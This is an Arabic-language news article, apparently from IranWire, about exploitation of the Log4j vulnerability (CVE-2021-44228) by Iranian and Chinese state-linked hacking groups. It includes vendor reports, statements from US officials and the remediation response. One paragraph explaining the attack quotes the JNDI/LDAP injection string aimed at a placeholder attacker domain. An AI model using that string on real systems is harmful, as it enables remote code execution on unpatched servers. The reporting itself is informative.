قراصنة النظامين الإيراني والصيني في طليعة من يستغلون الثغرات الأمنية

أحمد باطبي – إيران وير

تُعَّد الثغرة الأمنية المعروفة باسم “log4j” أخطر الثغرات الأمنية في تاريخ الفضاء الافتراضي التي هددت ملايين الأجهزة المتصلة بالإنترنت، واستغلها القراصنة التابعون للنظامين الإيراني والصيني.

ذكرت شركة مايكروسوفت في تقاريرها اسم مجموعة القرصنة المعروفة باسم “الفسفور (PHOSPHORUS)” كإحدى مجموعات القرصنة الرائدة في استغلال ثغرة Log4j، وصرحت بأن هذه المجموعة قد استغلت الثغرة (log4j) بما يتماشى مع أهدافها. كما يعتقد خبراء ميكروسوفت أنها تستغل هذه الثغرة لأغراض مختلفة بما في ذلك تحميل برامج الفدية على الأجهزة المستهدفة.

في وقت سابق، ذكر مركز معلومات التهديدات في شركة ميكروسوفت (MSTIC) اسم الفوسفور مبينًا أنه يراقب أنشطة هذه المجموعة التابعة للنظام الإيراني منذ عام 2013 على الأقل. وبحسب هذا المركز، فإن مجموعة الفوسفور وهي إحدى مجموعات “التهديد المتطور المستمر” (APT) التابعة للنظام الإيراني، قد ارتكبت عددًا من الجرائم بما في ذلك شن الهجمات الإلكترونية على مسؤولي الحكومة الأمريكية، ومحاولة التدخل في عملية الانتخابات الأمريكية، وإطلاق حملات تجسس على مواقع التواصل الاجتماعي ضد المواطنين وموظفي الشركات والناشطين والصحفيين.

في الأيام الأخيرة، أعلنت شركة Checkpoint الأمريكية الإسرائيلية للأمن السيبراني عن فشل قراصنة إيرانيين في مهاجمة عدة أهداف في إسرائيل. ووفق هذه الشركة، حاول قراصنة مجموعة الهررة الجذابة Charming Kitten، وهي مجموعة فرعية من التهديد المتطور المستمر (APT 35)، اختراق الشبكة الداخلية لسبع منظمات تجارية ومؤسسات حكومية إسرائيلية عبر استغلال الثغرة الأمنية (log4j)، لكن هذه المحاولة باءت بالفشل مع تدخل شركة Checkpoint.

كما أعلنت شركة Checkpoint في تقرير آخر عن محاولة القراصنة تثبيت برامج ضارة للتعدين المشفر باستخدام الثغرة الأمنية (log4j)، وقالوا إنه أثناء رصد هذه الثغرة الأمنية، اكتشف خبراء الشركة برنامجًا ضارًا يسمى Win32 sfrnp، والذي يعمل في التعدين المشفر crypto mining أو يخترق أنظمة التشغيل ويستغل قوتها في التعدين المشفر.

وفقًا لمايكروسوفت، بالإضافة إلى مجموعة الفوسفور الإيرانية، هناك مجموعة قراصنة صينية تسمى HAFNIUM تعمل خارج الصين، تستغل الثغرة الأمنية (log4j) لتوسيع أنشطتها.

وفقًا لمؤسسة Apache Software Foundation، أبلغت شركة “علي بابا” إحدى عمالقة التكنولوجيا الصينية عن ثغرة log4j الأمنية لأول مرة يوم الأربعاء 24 نوفمبر 2021. وبعد أسبوعين أي يوم الخميس الموافق 9 ديسمبر المنصرم تم تسجيل هذه الثغرة رسميًا والإعلان عنها بالمعرف “CVE-2021-44228”.

في الحقيقة، توجد هذه الثغرة الأمنية في برنامج “log4j” وهي تتيح لقراصنة الإنترنت إمكانية اختراق أنظمة التحكم الصناعية، والخوادم المضيفة للمواقع، والأجهزة الإلكترونية المختلفة. 

وفي هذا السياق، أشار “سيرجيو كالتالغيرون” نائب رئيس وحدة الاستخبارات في شركة “دراغوس إنكوروبوريشن” إحدى كبرى الشركات العالمية للأمن السيبراني، إلى خطورة التهديدات التي تخلقها هذه الثغرة الأمنية للصناعات الحيوية بما في ذلك الكهرباء والمياه والطعام والشراب والإنتاج والنقل، قائلًا: أعتقد أنه لا توجد أي متاجر للتطبيقات في العالم، لم يعاني من ثغرة (log4j) الأمنية على الأقل في القطاع الصناعي.

كما حذرت “جين ايسترلي” مديرة وكالة الأمن السيبراني بالولايات المتحدة يوم 20 ديسمبر المنصرم خلال تواصلها مع كبار المسؤولين وشركات القطاع الخاص في أمريكا، من الأبعاد الواسعة النطاق للثغرة الأمنية ” CVE-2021-44228″، قائلة: “هذه الثغرة هي واحدة من أخطر ما رأيت في حياتي المهنية بأكملها إن لم تكن الأكثر خطورة”.

يقول إريك غولدشتاين مساعد المدير التنفيذي للأمن السيبراني في وكالة أمن البنية التحتية والأمن الإلكتروني (CISA)، في وصفه الظروف الراهنة: “نحن نواجه ثغرة أمنية واسعة النطاق وسهلة الوصول تتيح للأعداء فرصة ارتكاب أعمال مضرة، كما أن إصلاح هذه الثغرة سيستغرق وقتًا”. 

هذا ويُعَّد برنامج log4j أحد أكثر مكتبات Log Javaشيوعًا، والذي تم تنزيله أكثر من 400 ألف مرة من مصدره في مستودع GitHub، ويستخدمه ما لا يقل عن 13 مليار جهاز حول العالم. حيث يمكن القول إنه يُستخدم من قبل أغلب التطبيقات وخدمات الإنترنت المعروفة؛ بما في ذلك Twitter وAmazon وMicrosoft وغيرها. وبالتالي فهذه التطبيقات معرضة لخطر تنفيذ الأكواد الضارة عن بُعد (Remote Code Execution).

تتواجد هذه الثغرة الأمنية الخطيرة بمُعرف ” CVE-2021-44228″ في Log4j 2 في الإصدار 2.14.1 وما قبله، وتسمح للمتسللين بتنفيذ الأكواد الضارة عن بُعد (Remote Code Execution) على الأجهزة المستهدفة والتحكم بها.

تستخدم التطبيقات المستندة إلى Java ميزة تسمى “JNDI” لاستدعاء عناصر Java، بالإضافة إلى بروتوكول يسمى “LDAP”. في البداية، يستخدم المتسللون محركات البحث أو أدوات التنقل لتحديد الثغرات، والأجهزة التي تستخدم حزمة “Log4j 2″، والإصدار “2.14.1” وما قبله، ومن خلال أحد هذه البرامج المتعلقة بالوحدات المتضررة ترسل سلاسل مثل “$ {jndi : ldap: // [attacker_domain] / file} “كجزء من اسم المستخدم وكلمة المرور ورقم الهاتف وما إلى ذلك. ويستخدم البرنامج ميزة JNDI تلقائيًا، ويعيد فئة “[attacker_domain] / file” إلى المهاجم باستخدام بروتوكول LDAP. وعلى هذا النحو يتم السماح بتنفيذ الأكواد الضارة عن بعد باستخدام “Log4Shell”.

يفرض إصدار Java 8 وما فوق قيودًا على سلاسل مثل «${jndi:ldap://…}»، لكن هذه القيود لا تدعم الصمود أمام الهجمات المعقدة. هذا لأن البرنامج مكتوب بلغة البرنامج النصي log4j2’s homebrew والذي يُعرف باسم (Lookups)  والذي مع قليل من الإبداع يمكن تطويره لمضاعفة IPS و WAF. ومن ناحية أخرى، فإن بنية مجموعة الرموز هذه تجعل من غير الممكن إجبار المجموعة بأكملها على استخدام الوحدة المصححة حتى إذا تم إصدار تصحيح أمان.

تكمن المشكلة الأكبر في أنه حتى إذا تم إصدار تصحيح أمني وتم إصلاح الثغرة الأمنية، فإن معرفة ما إذا كان الجهاز مُصابًا أو غير مصاب، سيكون أمرًا معقدًا ومكلفًا وسيستغرق وقتًا طويلًا. وقد يكون المتسللون المنظمون قد اخترقوا الشبكة الداخلية للمنظمات والشركات وأنشأوا “بابًا خلفيًا” بعيدًا عن أعين مسؤولي الشبكة ليشنوا هجومًا فيما بعد، أو يكونوا قد استغلوا أهدافًا مخترقة. من هذا المنطلق، وحتى إذا لم يتم اكتشاف عملية الاختراق أو القرصنة، فإن الفحص الفني والتأكد من عدم إصابة الشبكة أمر ضروري. وبالنظر إلى نطاق هذه الثغرة الأمنية، يمكن تقدير التكلفة التي ستتكبدها المؤسسات والشركات لإجراء فحص تقني للشبكة لضمان عدم وجود مشكلة محتملة.

هذا وقد أنشأت وكالة الأمن السيبراني وأمن البنية التحتية الأمريكية (CISA)، يوم الثلاثاء 21 ديسمبر المنصرم صفحة مخصصة لمعالجة الثغرات الأمنية (Apache Log4j) و”CVE-2021-44228″، وأصدرت التعليمات التنفيذية اللازمة تحت مسمى (BOD) 22-01 و(ED) 22-02 لتقليل الضرر الذي تسببه هذه الثغرة العالمية.

كما قدمت كبرى شركات الأمن السيبراني، العديد من الاقتراحات والحلول للحد من التهديدات المحتملة لهذه الثغرة الأمنية.